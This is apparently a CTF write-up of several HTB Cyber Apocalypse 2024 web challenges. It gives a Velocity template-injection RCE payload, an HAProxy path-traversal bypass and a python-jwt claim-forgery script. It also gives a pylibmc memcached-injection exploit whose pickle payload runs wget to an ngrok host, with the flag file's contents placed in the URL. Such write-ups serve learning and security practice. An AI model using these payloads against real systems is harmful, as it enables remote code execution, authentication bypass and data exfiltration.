We just finished playing the HTB Cyber Apocalypse 2024. It was real fun. I wasn’t able to mainly solve 2 of the hard challenges. Neverthless, it was real fun and just like every other time, got new things to learn. I mainly focused on web and tried one challenge from Misc which i wasn’t able to solve. Anyhow, the writeups for some of the interesting web one’s that i sovled.
Labyrinth Linguist - Easy
I reviewed whole code. First thing i noticed is the use of velocity
template engine in the application. Moreover, the version that was specified for usage was 1.7
The specified version was quite an outdated version of the library. Now, first thing i did was try to read the code and look for any SSTIs.
public static String readFileToString(String filePath, String replacement) throws IOException {StringBuilder content = new StringBuilder();BufferedReader bufferedReader = null;try {bufferedReader = new BufferedReader(new FileReader(filePath));String line;while ((line = bufferedReader.readLine()) != null) {line = line.replace("TEXT", replacement);content.append(line);content.append("\n");}} finally {if (bufferedReader != null) {try {bufferedReader.close();} catch (IOException e) {e.printStackTrace();}}}return content.toString();}
So, we definitely are replacing the the word TEXT
with the our input. And later on this code was processed here:
org.apache.velocity.Template t = new org.apache.velocity.Template();t.setRuntimeServices(runtimeServices);try {t.setData(runtimeServices.parse(reader, "home"));t.initDocument();VelocityContext context = new VelocityContext();context.put("name", "World");StringWriter writer = new StringWriter();t.merge(context, writer);template = writer.toString();} catch (ParseException e) {e.printStackTrace();}
At first i confirmed the injection by providing the $name
value to the text
parameter and it replaced it with world
. Now, doing a bit of googling, i discovered a CVE
for this specific version of Velocity
I used the following payload with the name param
I used curl to execute the payload and got the right execution:
curl.exe '' -X POST --data-raw 'text=%23set($e=%22e%22);$e.getClass().forName(%22java.lang.Runtime%22).getMethod(%22getRuntime%22,null).invoke(null,null).exec(%22whoami%22)'
However, i had a hard time getting the flag since i wasn’t able to get a reverse shell or place some special characters in the command. This seemed like a dead end for a second. But then i fired up sstimap
against it.
And to my surprise i was able to get an OS Shell directly without having to do the CVE exploit:
python3 sstimap.py --url -f --os-shell --engine velocity
Get the flag
cat /flag*
It was a flask application with haproxy in front of the application. Reviewing the code, i found 3 APIs that i can request:
@api_blueprint.route('/get_ticket', methods=['GET'])def get_ticket():claims = {"role": "guest","user": "guest_user"}token = jwt.generate_jwt(claims, current_app.config.get('JWT_SECRET_KEY'), 'PS256', datetime.timedelta(minutes=60))return jsonify({'ticket: ': token})@api_blueprint.route('/chat/<int:chat_id>', methods=['GET'])@authorize_roles(['guest', 'administrator'])def chat(chat_id):...@api_blueprint.route('/flag', methods=['GET'])@authorize_roles(['administrator'])def flag():return jsonify({'message': current_app.config.get('FLAG')}), 200
The goal here is to generate a ticket and somehow modify the claim so that the role we use is of administrator. However, we can’t simply request the /get_ticket
api because of haproxy
globaldaemonmaxconn 256defaultsmode httptimeout connect 5000mstimeout client 50000mstimeout server 50000msfrontend haproxybind backendhttp-request deny if { path_beg,url_dec -i /api/v1/get_ticket }backend backendbalance roundrobinserver s1 maxconn 32 check
I bypassed the filter rule with the simple listing:
curl http://localhost:1337/../api/v1/get_ticket -i --path-as-is
The above returned me with the JWT
token needed.
Now, checking the requirements of project, i found python_jwt==3.3.3
Heading to google, i found a security advisory of the project on Github: https://github.com/davedoesdev/python-jwt/security/advisories/GHSA-5p8v-58qm-c7fp
It seems as if i can modify the claims of the JWT for versions <3.3.4
In one of the commits of the repo of fixing this issue i found a code that i the modified to write my own exploit. Make sure to replace the token in the create
from datetime import timedeltafrom json import loads, dumpsimport python_jwt as jwtfrom pyvows import Vows, expectfrom jwcrypto.common import base64url_decode, base64url_encodefrom pprint import pprintclass ForgedClaims:def create(self):""" Generate token """# payload = {'sub': 'alice'}token = "eyJhbGciOiJQUzI1NiIsInR5cCI6IkpXVCJ9.eyJleHAiOjE3MTAxNDc1MTksImlhdCI6MTcxMDE0MzkxOSwianRpIjoiYmQtcW5GYnBqcUhpbEFSeXN5aGwyUSIsIm5iZiI6MTcxMDE0MzkxOSwicm9sZSI6Imd1ZXN0IiwidXNlciI6Imd1ZXN0X3VzZXIifQ.s569WtLjeq3NQSI9GXVDfTYJSUrxdEGtCBnxjHnwEa6UWwS6RNfLF-qMjvAc-GiqHzG1Wx1SQd1tsqIqnIF6zz9zXFQaSimFgnYE0HvUwaI_XhzBJA-ZxmrgetgJjbOhKBOopKIXmtUt-LPE2tsB3yr6SJe-C2RvFlTzrgQMDrOtRBJJiXfYne1QI4nnXUFY0XsNXCpKQIe6ELHNmeE-F6Fj5s1AJwUEBwWJNVnmw_s5mVbL1hvIE54e2mJg5VK8PfCLXx4u-ghVRgGDRkUza4UpgM8nrSmTj5d40iREyz9M6PDvi0TFhuVvlQStrpz0UId-uyL4-Vwp9UnTOSNBRA"return tokendef topic(self, topic):""" Use mix of JSON and compact format to insert forged claims including long expiration """[header, payload, signature] = topic.split('.')parsed_payload = loads(base64url_decode(payload))print(parsed_payload)parsed_payload['role'] = 'administrator'parsed_payload['user'] = 'admin_user'print(parsed_payload)# parsed_payload['exp'] = 2000000000fake_payload = base64url_encode((dumps(parsed_payload, separators=(',', ':'))))return '{" ' + header + '.' + fake_payload + '.":"","protected":"' + header + '", "payload":"' + payload + '","signature":"' + signature + '"}'claime__ = ForgedClaims()jwt = claime__.create()print(claime__.topic(jwt))
I ran the code and got the following payload:
{" eyJhbGciOiJQUzI1NiIsInR5cCI6IkpXVCJ9.eyJleHAiOjE3MTAxNDc1MTksImlhdCI6MTcxMDE0MzkxOSwianRpIjoiYmQtcW5GYnBqcUhpbEFSeXN5aGwyUSIsIm5iZiI6MTcxMDE0MzkxOSwicm9sZSI6ImFkbWluaXN0cmF0b3IiLCJ1c2VyIjoiYWRtaW5fdXNlciJ9.":"","protected":"eyJhbGciOiJQUzI1NiIsInR5cCI6IkpXVCJ9", "payload":"eyJleHAiOjE3MTAxNDc1MTksImlhdCI6MTcxMDE0MzkxOSwianRpIjoiYmQtcW5GYnBqcUhpbEFSeXN5aGwyUSIsIm5iZiI6MTcxMDE0MzkxOSwicm9sZSI6Imd1ZXN0IiwidXNlciI6Imd1ZXN0X3VzZXIifQ","signature":"s569WtLjeq3NQSI9GXVDfTYJSUrxdEGtCBnxjHnwEa6UWwS6RNfLF-qMjvAc-GiqHzG1Wx1SQd1tsqIqnIF6zz9zXFQaSimFgnYE0HvUwaI_XhzBJA-ZxmrgetgJjbOhKBOopKIXmtUt-LPE2tsB3yr6SJe-C2RvFlTzrgQMDrOtRBJJiXfYne1QI4nnXUFY0XsNXCpKQIe6ELHNmeE-F6Fj5s1AJwUEBwWJNVnmw_s5mVbL1hvIE54e2mJg5VK8PfCLXx4u-ghVRgGDRkUza4UpgM8nrSmTj5d40iREyz9M6PDvi0TFhuVvlQStrpz0UId-uyL4-Vwp9UnTOSNBRA"}
Note that we need to place the payload as it is as our new JWT token to make it work:
curl -i "" -H 'Authorization: {" eyJhbGciOiJQUzI1NiIsInR5cCI6IkpXVCJ9.eyJleHAiOjE3MTAxNDc1MTksImlhdCI6MTcxMDE0MzkxOSwianRpIjoiYmQtcW5GYnBqcUhpbEFSeXN5aGwyUSIsIm5iZiI6MTcxMDE0MzkxOSwicm9sZSI6ImFkbWluaXN0cmF0b3IiLCJ1c2VyIjoiYWRtaW5fdXNlciJ9.":"","protected":"eyJhbGciOiJQUzI1NiIsInR5cCI6IkpXVCJ9", "payload":"eyJleHAiOjE3MTAxNDc1MTksImlhdCI6MTcxMDE0MzkxOSwianRpIjoiYmQtcW5GYnBqcUhpbEFSeXN5aGwyUSIsIm5iZiI6MTcxMDE0MzkxOSwicm9sZSI6Imd1ZXN0IiwidXNlciI6Imd1ZXN0X3VzZXIifQ","signature":"s569WtLjeq3NQSI9GXVDfTYJSUrxdEGtCBnxjHnwEa6UWwS6RNfLF-qMjvAc-GiqHzG1Wx1SQd1tsqIqnIF6zz9zXFQaSimFgnYE0HvUwaI_XhzBJA-ZxmrgetgJjbOhKBOopKIXmtUt-LPE2tsB3yr6SJe-C2RvFlTzrgQMDrOtRBJJiXfYne1QI4nnXUFY0XsNXCpKQIe6ELHNmeE-F6Fj5s1AJwUEBwWJNVnmw_s5mVbL1hvIE54e2mJg5VK8PfCLXx4u-ghVRgGDRkUza4UpgM8nrSmTj5d40iREyz9M6PDvi0TFhuVvlQStrpz0UId-uyL4-Vwp9UnTOSNBRA"}'
And got the flag:
Analyzing the code of the application, i got that application is using the library flask-session
with pylibmc
to store sessions in memcached.
import pylibmc, uuid, sysfrom flask import Flask, session, request, redirect, render_templatefrom flask_session import Sessionapp = Flask(__name__)app.secret_key = uuid.uuid4()app.config["SESSION_TYPE"] = "memcached"app.config["SESSION_MEMCACHED"] = pylibmc.Client([""])app.config.from_object(__name__)Session(app)
At this point, i thougt it would be a plain memcached injection but nothing. Doing a bit of google i found various articles on memcached injection with other libraries from Python. However, i found this one blog on pylibmc
exploitation: https://btlfry.gitlab.io/notes/posts/memcached-command-injections-at-pylibmc/
Reading the blog, i got that we can do a memcached injection with pylibmc
by using carriage return line breaks by encoding the payload in a special sequence that is being understood by the HTTP protocol. However, the tricky part for me was to identify where to place the payload. In the blog, the author used a cookie named notsecret
which i wasn’t sure of. After spending some more time on this, i found the author’s twitter where he attached a GIF of the exploit and used it as the session cookie.
The good thing was we got the exploit code from the blog. I modified it a bit to send request to my ngrok
import pickleimport osclass RCE:def __reduce__(self):cmd = ('wget https://b058-2407-d000-403-e00e-60d2-910d-df7c-df4d.ngrok-free.app',)return os.system, (cmd,)def generate_exploit():payload = pickle.dumps(RCE(), 0)payload_size = len(payload)cookie = b'137\r\nset BT_:1337 0 2592000 'cookie += str.encode(str(payload_size))cookie += str.encode('\r\n')cookie += payloadcookie += str.encode('\r\n')cookie += str.encode('get BT_:1337')pack = ''for x in list(cookie):if x > 64:pack += oct(x).replace("0o","\")elif x < 8:pack += oct(x).replace("0o","\00")else:pack += oct(x).replace("0o","\0")return f""{pack}""if __name__ == "__main__":print(generate_exploit())
The payload i got looked something like this:
As per the HTTP specs, we need send it with double quotes as the session cookie. I used burp:
At first it returned me a 200
response. While i should have gotten an Internal Server Error
. Running it a couple times, returned me a request on my ngrok
So, i modified the exploit a bit to get the flag:
class RCE:def __reduce__(self):cmd = ('wget "https://b058-2407-d000-403-e00e-60d2-910d-df7c-df4d.ngrok-free.app$(cat /flag*)"',)return os.system, (cmd,)
I sent the request second and got the response on terminal:
# python -m http.server 8080Serving HTTP on :: port 8080 (http://[::]:8080/) ...::1 - - [12/Mar/2024 22:06:38] code 404, message File not found::1 - - [12/Mar/2024 22:06:38] "GET /somethingHTB%7By0u_th0ught_th15_wou1d_b3_s1mpl3?} HTTP/1.1" 404 -
Ending Note
Overall, it was really fun playing the CTF and just like any other time, i got new things to learn :)